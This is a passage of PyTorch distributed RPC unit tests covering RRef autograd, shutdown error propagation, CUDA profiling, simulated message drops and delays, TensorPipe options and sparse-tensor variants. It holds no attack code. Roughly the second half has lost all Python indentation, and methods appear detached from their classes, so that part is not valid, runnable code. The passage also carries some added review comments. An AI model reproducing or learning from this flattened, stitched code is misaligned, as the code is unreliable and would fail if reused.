    def test_cannot_infer_backend_from_options(self):
        """init_rpc without a backend must fail on unrecognized options."""
        # An exception should be raised if the backend isn't specified but
        # options are given which are not an instance of any of the known
        # agents' option classes.
        rpc_backend_options = FooBackendOptions(self.init_method)
        with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
            rpc.init_rpc(
                name=worker_name(self.rank),
                rank=self.rank,
                world_size=self.world_size,
                # Do _not_ pass backend.
                rpc_backend_options=rpc_backend_options,
            )
    @dist_init
    def test_owner_rref_backward(self):
        """OwnerRRef.backward(): local autograd, dist autograd context,
        double backward, and the documented error cases."""
        dst = worker_name((self.rank + 1) % self.world_size)
        t1 = torch.rand(10, 10, requires_grad=True)
        rref = rpc.RRef(t1.sum() + t1.sum())
        rref.backward()
        expected_grad = torch.ones_like(t1) * 2
        self.assertEqual(expected_grad, t1.grad)
        with dist_autograd.context() as context_id:
            t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
            rref = rpc.RRef(t2.sum())
            rref.backward(context_id)
            self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
        # Double backward.
        with dist_autograd.context() as context_id:
            t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
            rref = rpc.RRef(t2.sum())
            rref.backward(context_id, retain_graph=True)
            rref.backward(context_id)
            self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
        # Test errors.
        with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
            rpc.RRef(torch.rand(10)).backward()
        with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
            rpc.RRef(torch.rand(10, requires_grad=True)).backward()
        with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
            rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
        with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
            rpc.RRef("foo").backward()
    @staticmethod
    def _sum(x):
        # Reduce a tensor to a scalar; used as a remote UDF below.
        return x.sum()
    @staticmethod
    def _identity(x):
        # Pass-through; used to remote a non-tensor value below.
        return x
    @dist_init
    def test_user_rref_backward(self):
        """UserRRef.backward(): works with a dist autograd context and rejects
        non-tensor values or a missing context id."""
        dst = worker_name((self.rank + 1) % self.world_size)
        t = torch.rand(10, requires_grad=True)
        with dist_autograd.context() as context_id:
            rref = rpc.remote(dst, RpcTest._sum, args=(t,))
            rref.backward(context_id, retain_graph=True)
            rref.backward(context_id)
            self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
        with dist_autograd.context() as context_id:
            rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
            with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
                rref.backward(context_id)
            with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
                rref.backward()
    @dist_init(setup_rpc=False)
    def test_shutdown_errors(self):
        """Errors raised by internal helpers during shutdown must propagate
        on both leader (rank 0) and followers."""
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        if self.rank != 0:
            og_func = rpc.api._broadcast_to_followers
            og_rref_func = rpc.api._delete_all_user_and_unforked_owner_rrefs
            # Monkey-patch _broadcast_to_followers to fail, which would ensure
            # _all_gather on leader raises an exception.
            def raise_error(sequence_id, objects_map):
                og_func(sequence_id, objects_map)
                raise RuntimeError('simulation')
            # Monkey-patch _delete_all_user_and_unforked_owner_rrefs to fail,
            # which would ensure barrier is not called on followers.
            def rref_error():
                raise RuntimeError('simulation rref')
            try:
                rpc.api._broadcast_to_followers = raise_error
                rpc.api._delete_all_user_and_unforked_owner_rrefs = rref_error
                with self.assertRaisesRegex(RuntimeError, 'simulation rref'):
                    rpc.shutdown()
            finally:
                # Always restore the originals so later tests see intact APIs.
                rpc.api._broadcast_to_followers = og_func
                rpc.api._delete_all_user_and_unforked_owner_rrefs = og_rref_func
        else:
            with self.assertRaisesRegex(RuntimeError, 'timed out in _all_gather'):
                rpc.shutdown()
        dist.barrier()
    def _trainer_func(self, rref, sparse):
        """Trainer loop for the parameter-server test: push local gradients to
        the PS via ``rref`` and check the averaged gradient matches what the
        PS stored.

        NOTE(review): assumes ``rref`` proxies an object exposing
        ``average(rref, step, grad)`` and ``get_gradient(rref)`` — defined
        elsewhere in this file.
        """
        m = MyEmbeddingBagModel(sparse=sparse)
        loss_fn = nn.MSELoss()
        for i in range(10):
            outputs = m(torch.rand(10, 10).long())
            loss_fn(outputs, torch.rand(10, 10)).backward()
            gradient = list(m.parameters())[0].grad
            fut = rref.rpc_async().average(rref, i, gradient)
            gradient = fut.wait()
            if gradient.is_sparse:
                gradient = gradient.to_dense().double()
            ps_gradient = rref.rpc_sync().get_gradient(rref)
            if ps_gradient.is_sparse:
                ps_gradient = ps_gradient.to_dense().double()
            self.assertTrue(torch.equal(gradient, ps_gradient))
    @dist_init
    def test_my_parameter_server(self):
        # Dense-gradient variant of the parameter-server test.
        self._my_parameter_server(False)
class CudaRpcTest(RpcAgentTestFixture):
    """RPC tests that require CUDA devices (at least 2 GPUs)."""
    @skip_if_lt_x_gpu(2)
    @dist_init
    def test_profiler_remote_cuda(self):
        """Profiled remote CUDA ops must report kernels on the correct remote
        device, while local async events report no CUDA time."""
        # Only rank 1 drives the test; other ranks just serve RPCs.
        if self.rank != 1:
            return
        dst_cuda_0 = (self.rank + 1) % self.world_size
        dst_cuda_1 = (self.rank + 2) % self.world_size
        dst_worker_cuda_0 = worker_name(dst_cuda_0)
        dst_worker_cuda_1 = worker_name(dst_cuda_1)
        with _profile(use_cuda=True) as p:
            fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
            fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
            fut1.wait()
            fut2.wait()
        def get_name(event):
            # Strip everything up to and including the remote-op marker.
            return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
        function_events = p.function_events
        for event in function_events:
            if event.is_async:
                # Local async send events carry no CUDA activity.
                self.assertEqual(0, event.cuda_time_total)
                self.assertEqual([], event.kernels)
                self.assertEqual(0, event.cuda_time)
            else:
                if event.node_id == 1:
                    continue
                self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
                if get_name(event) in EXPECTED_REMOTE_EVENTS:
                    self.assertGreater(event.cuda_time_total, 0)
                    self.assertEqual(1, len(event.kernels))
                    kernel = event.kernels[0]
                    # Kernel device must match the destination worker's GPU.
                    if event.node_id == dst_cuda_0:
                        self.assertEqual(kernel.device, 0)
                    if event.node_id == dst_cuda_1:
                        self.assertEqual(kernel.device, 1)
                    self.assertGreater(event.cuda_time, 0)
        # Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
        # events.
        remote_events = [event for event in function_events if event.is_remote]
        remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
        self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
    """Tests against the faulty RPC agent, which drops or delays configured
    message types to exercise retry, timeout, and error-propagation paths."""
    # no faulty_messages defined so this fails all retryable messages - see
    # faulty_rpc_agent_test_fixture.py for the list of retryable messages.
    @dist_init(messages_to_delay={})
    def test_check_failed_messages(self):
        """Retryable messages that initially fail must still succeed."""
        if self.rank == 0:
            dst_worker_b = worker_name((self.rank + 1) % self.world_size)
            dst_worker_c = worker_name((self.rank + 2) % self.world_size)
            # Worker0 sends RPC to Worker1 and creates an RRef there
            rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
            # Worker0 sends an RPC to Worker2 with the RRef as an arg
            rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
            # check if the output is as expected
            self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
        # explicitly delete all User RRefs
        _delete_all_user_and_unforked_owner_rrefs()
    @dist_init
    def test_verify_backend_options(self):
        """The faulty fixture's default backend options must be as expected."""
        self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
        self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
        self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
        self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
        self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
        self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
    @dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
    def test_custom_faulty_messages(self):
        # Custom faulty message list must be reflected in the options.
        self.assertEqual(
            set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
            set(self.rpc_backend_options.messages_to_fail),
        )
    @dist_init(faulty_messages=[])
    def test_no_faulty_messages(self):
        # An empty faulty message list must be honored.
        self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
    @dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
    def test_custom_messages_to_delay(self):
        # Custom delay map must be reflected in the options.
        self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
    def _test_remote_message_dropped_pickle(self, dst=None):
        """When the remote-call message is dropped, forking the RRef (via
        _serialize or passing it as an RPC arg) must raise."""
        if self.rank != 0:
            return
        dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
        dst_worker = "worker{}".format(dst_rank)
        # Since we fail python_remote_call messages synchronously, the future
        # corresponding to this remote call will be marked with an error when
        # this function returns.
        rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
        # Call to ensure pending callbacks are run.
        wait_until_pending_futures_and_users_flushed()
        # Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
        with self.assertRaisesRegex(RuntimeError, "RRef creation"):
            rref._serialize()
        # Test that using RRef as arg over RPC (which forks) results in the same
        # error
        with self.assertRaisesRegex(RuntimeError, "RRef creation"):
            rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
    @dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
    def test_remote_message_dropped_pickle(self):
        # Remote destination variant.
        self._test_remote_message_dropped_pickle()
    @dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
    def test_remote_message_dropped_pickle_to_self(self):
        # Self-destination variant.
        self._test_remote_message_dropped_pickle(self.rank)
    def _test_remote_message_dropped_timeout(self, func, args, dst=None):
        """When rpc.remote() creation is dropped entirely, to_here() must fail
        with an RRef-creation error."""
        if self.rank != 0:
            return
        # test the case where rpc.remote() message creation is completely dropped.
        dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
        dst_worker = "worker{}".format(dst_rank)
        # Since we fail python_remote_call messages synchronously, the future
        # corresponding to this remote call will be marked with an error when
        # this function returns.
        rref = rpc.remote(dst_worker, func, args=args)
        # Call to ensure pending callbacks are run.
        wait_until_pending_futures_and_users_flushed()
        with self.assertRaisesRegex(RuntimeError, "RRef creation"):
            rref.to_here()
        # Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
        # on the owning nodes, this is expected because the OwnerRRef was never
        # successfully created. Therefore, delAllUsers will work as expected.
    @dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
    def test_builtin_remote_message_dropped_timeout(self):
        # Builtin op, remote destination.
        func = torch.add
        args = (torch.tensor(1), torch.tensor(1))
        self._test_remote_message_dropped_timeout(func, args)
    @dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
    def test_builtin_remote_message_dropped_timeout_to_self(self):
        # Builtin op, self destination.
        func = torch.add
        args = (torch.tensor(1), torch.tensor(1))
        self._test_remote_message_dropped_timeout(func, args, dst=0)
    @dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
    def test_udf_remote_message_dropped_timeout(self):
        # Python UDF, remote destination.
        func = my_sleep_func
        args = (2,)
        self._test_remote_message_dropped_timeout(func, args)
    @dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
    def test_udf_remote_message_dropped_timeout_to_self(self):
        # Python UDF, self destination.
        func = my_sleep_func
        args = (2,)
        self._test_remote_message_dropped_timeout(func, args, dst=0)
    def _test_remote_message_delay_timeout(self, func, args, dst=None):
        """When the remote message is delayed past the creation timeout, the
        creator-side future and to_here() must both report the failure."""
        if self.rank != 0:
            return
        # Test the case where remote message is eventually processed on the owner,
        # but the future on the creator times out before the response comes back.
        dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
        dst_worker = "worker{}".format(dst_rank)
        # 1 ms timeout (0.001 s); must be shorter than the configured delay.
        rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
        # Future corresponding to the remote creation should time out.
        expected_error = self.get_timeout_error_regex()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rref._get_future().wait()
        # Call to ensure pending callbacks are run.
        wait_until_pending_futures_and_users_flushed()
        # to_here() should now pick up that rpc.remote() creation has failed.
        with self.assertRaisesRegex(RuntimeError, "RRef creation"):
            rref.to_here()
        # Test the case where rpc.remote() times out, but to_here() has already
        # started blocking before.
        # NOTE: we only test this when not sending to self, as to_here() calls
        # calls localValue(), which does not send an RPC and thus does not have
        # a timeout. This can be supported by allowing future.wait() to
        # take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
        if dst_rank != self.rank:
            slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
            with self.assertRaisesRegex(RuntimeError, expected_error):
                # to_here() should raise timeout error, since it does not know about the
                # status of rpc.remote().
                slow_rref.to_here(0.001)
        # Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
        # but this can be a noop since it may not exist on the owner yet. Later,
        # the owner can process the RRef creation and wait for the delete message,
        # thus leading to a timeout.
        # Therefore, we wait until we get notification that pending owners have
        # been confirmed before sending out RRefUserDeletes.
        if dst_rank != self.rank:
            wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
    @dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
    def test_udf_remote_message_delay_timeout(self):
        # Python UDF, remote destination.
        func = my_sleep_func
        args = (2,)
        self._test_remote_message_delay_timeout(func, args)
    @dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
    def test_udf_remote_message_delay_timeout_to_self(self):
        # Python UDF, self destination.
        func = my_sleep_func
        args = (1,)
        self._test_remote_message_delay_timeout(func, args, dst=0)
    @dist_init(
        faulty_messages=[],
        messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
    )
    def test_remote_message_builtin_delay_timeout(self):
        # Builtin op, remote destination.
        func = torch.add
        args = (torch.tensor(1), torch.tensor(1))
        self._test_remote_message_delay_timeout(func, args)
    @dist_init(
        faulty_messages=[],
        messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
    )
    def test_remote_message_builtin_delay_timeout_to_self(self):
        # Builtin op, self destination.
        func = torch.add
        args = (torch.tensor(1), torch.tensor(1))
        self._test_remote_message_delay_timeout(func, args, dst=0)
    @dist_init(
        faulty_messages=[],
        messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
    )
    def test_remote_message_script_delay_timeout(self):
        # TorchScript function, remote destination.
        func = my_script_func
        args = (torch.tensor(1),)
        self._test_remote_message_delay_timeout(func, args)
    @dist_init(
        faulty_messages=[],
        messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
    )
    def test_remote_message_script_delay_timeout_to_self(self):
        # TorchScript function, self destination.
        func = my_script_func
        args = (torch.tensor(1),)
        self._test_remote_message_delay_timeout(func, args, dst=0)
    @dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
    def test_rref_to_here_timeout(self):
        """to_here() with a short timeout must fail while the fetch is
        delayed, then succeed without a timeout."""
        if self.rank != 0:
            return
        dst_rank = (self.rank + 1) % self.world_size
        dst_worker = "worker{}".format(dst_rank)
        rref = rpc.remote(
            dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
        )
        expected_error = self.get_timeout_error_regex()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rref.to_here(0.01)
        rref.to_here()
    @dist_init(faulty_messages=[])
    def test_rpc_builtin_timeout(self):
        """Per-call and default timeouts for builtin-op RPCs."""
        next_rank = (self.rank + 1) % self.world_size
        dst_worker = worker_name(next_rank)
        expected_error = self.get_timeout_error_regex()
        # PYTHON_CALL message types which correspond to Python UDF over RPC
        # by default get a delay (see faulty_rpc_agent_test_fixture)
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rpc.rpc_sync(
                dst_worker,
                torch.add,
                args=(torch.tensor(1), torch.tensor(1)),
                timeout=1,
            )
        fut = rpc.rpc_async(
            dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
        )
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        # Ensure that the currently set default timeout is large enough such
        # that RPCs with delays still complete.
        fut = rpc.rpc_async(
            dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
        )
        fut.wait()
        # Ensure timeout if we set a new default and don't override
        rpc._set_rpc_timeout(0.001)
        fut = rpc.rpc_async(
            dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
        )
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        # Ensure run to completion if we specify timeout of 0
        fut = rpc.rpc_async(
            dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
        )
        fut.wait()
        # Reset for clean shutdown
        rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
    @dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
    def test_rpc_script_timeout(self):
        """Per-call and default timeouts for TorchScript-function RPCs."""
        next_rank = (self.rank + 1) % self.world_size
        dst_worker = worker_name(next_rank)
        expected_error = self.get_timeout_error_regex()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
        fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        # Ensure that the currently set default timeout is large enough such
        # that RPCs with delays still complete.
        fut = rpc.rpc_async(
            dst_worker, my_script_func, args=(torch.tensor(1),)
        )
        fut.wait()
        # Ensure timeout if we set a new default and don't override
        rpc._set_rpc_timeout(0.001)
        fut = rpc.rpc_async(
            dst_worker, my_script_func, args=(torch.tensor(1),)
        )
        with self.assertRaisesRegex(RuntimeError, expected_error):
            fut.wait()
        # Ensure run to completion if we specify timeout of 0
        # NOTE(review): this reset is redundant — the default is already 0.001
        # from the line above; the builtin-op test omits it.
        rpc._set_rpc_timeout(0.001)
        fut = rpc.rpc_async(
            dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
        )
        fut.wait()
        # Reset for clean shutdown
        rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture, RpcTestCommon):
    def test_mismatched_type_for_options(self):
        """TensorPipe backend must reject foreign options objects."""
        # An exception should be raised if the options are not an instance of
        # TensorPipeRpcBackendOptions.
        rpc_backend_options = FooBackendOptions(self.init_method)
        with self.assertRaisesRegex(
            TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
        ):
            rpc.init_rpc(
                name=worker_name(self.rank),
                rank=self.rank,
                world_size=self.world_size,
                backend=rpc.BackendType.TENSORPIPE,
                rpc_backend_options=rpc_backend_options,
            )
    def test_infer_backend_from_options(self):
        """Passing TensorPipeRpcBackendOptions without a backend must select
        the TensorPipe agent."""
        rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
            init_method=self.init_method
        )
        rpc.init_rpc(
            name=worker_name(self.rank),
            rank=self.rank,
            world_size=self.world_size,
            # Do _not_ pass backend.
            rpc_backend_options=rpc_backend_options,
        )
        self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
    # FIXME Merge this test with the corresponding one in RpcTest.
    @dist_init(setup_rpc=False)
    def test_set_and_get_num_worker_threads(self):
        """num_worker_threads option must be reflected in agent debug info."""
        NUM_THREADS = 27
        rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
            init_method=self.rpc_backend_options.init_method,
            num_worker_threads=NUM_THREADS
        )
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=rpc_backend_options,
        )
        info = rpc.api._get_current_rpc_agent().get_debug_info()
        self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
        rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
# Set a high timeout since it doesn't affect test runtime and ensures
# the test doesn't erroneously timeout due to slow machines.
timeout = 100
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
    """Calling a torch operator over RPC with arguments that match no
    overload must surface the schema-matching RuntimeError to the caller.

    Bug fix: the expected-error regex previously read "failed to many any
    schema", which can never match the actual PyTorch error message
    "failed to match any schema", so the assertion could not succeed.
    """
    dst = worker_name((self.rank + 1) % self.world_size)
    with self.assertRaisesRegex(
        RuntimeError,
        # Must match the overload-resolution error raised by torch.
        "Overloaded torch operator invoked from Python failed to match any schema",
    ):
        # torch.add with an empty args tuple matches no overload.
        rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
# Helper: verify that RRef proxy calls (rpc_sync/rpc_async/remote)
# honor a per-call timeout, both when the remote method itself is slow
# and when the RRef is slow to be created on the owner.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we
# time out in future creation, not waiting for future. This is because
# rref proxy function calls rref._get_type before returning future,
# which blocks on the RRef being created on owner node, until the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# rpc_async returns immediately and surface a timeout through wait()
if rref_api == slow_rref.rpc_async:
result.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
# Exercise the timeout helper for each of the three proxy APIs.
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
class MyConvNetForMNIST(nn.Module):
# Small MNIST-style CNN used by the CUDA RPC tests. forward() deliberately
# delays the current CUDA stream so that missing stream synchronization in
# the RPC layer shows up as wrong results.
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
# x may arrive as an RRef; fetch the value first in that case.
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
# Sparse-tensor variants of the dense RPC tests; each wrapper delegates to a
# shared helper (defined in RpcTestCommon) with build_sparse_tensor() inputs.
@dist_init
def test_send_to_rank_sparse(self):
dst_rank = (self.rank + 1) % self.world_size
# Test sparse tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor()
y = build_sparse_tensor()
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
# Repeat with coalesced sparse tensors.
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
x = build_sparse_tensor(coalesce=True)
y = build_sparse_tensor(coalesce=True)
expected_tensor = (x + y)
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(x, y))
self.assertEqual(expected_tensor, ret)
@dist_init
def test_self_py_udf_remote_sparse(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_rpc_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg_sparse(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_remote_arg_sparse(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_self_remote_rref_as_self_remote_arg_sparse(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor()
)
def test_world_size_one_sparse(self):
self._world_size_one(
build_sparse_tensor(),
build_sparse_tensor()
)
@dist_init
def test_multi_rpc_sparse(self):
self._multi_rpc(True)
def test_wait_all_workers_sparse(self):
self._wait_all_workers(heavy_rpc_sparse, build_sparse_tensor())
def test_wait_all_workers_twice_sparse(self):
self._wait_all_workers_twice(heavy_rpc_sparse, build_sparse_tensor())
@dist_init
def test_py_sparse_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [build_sparse_tensor(), build_sparse_tensor()]
ret = rpc.rpc_sync(
worker_name(dst_rank), my_container_sum, args=(a,)
)
self.assertEqual(ret, my_container_sum(a))
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
# More sparse-tensor variants of dense RPC tests (remote/RRef helpers).
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_multi_py_udf_remote_sparse(self):
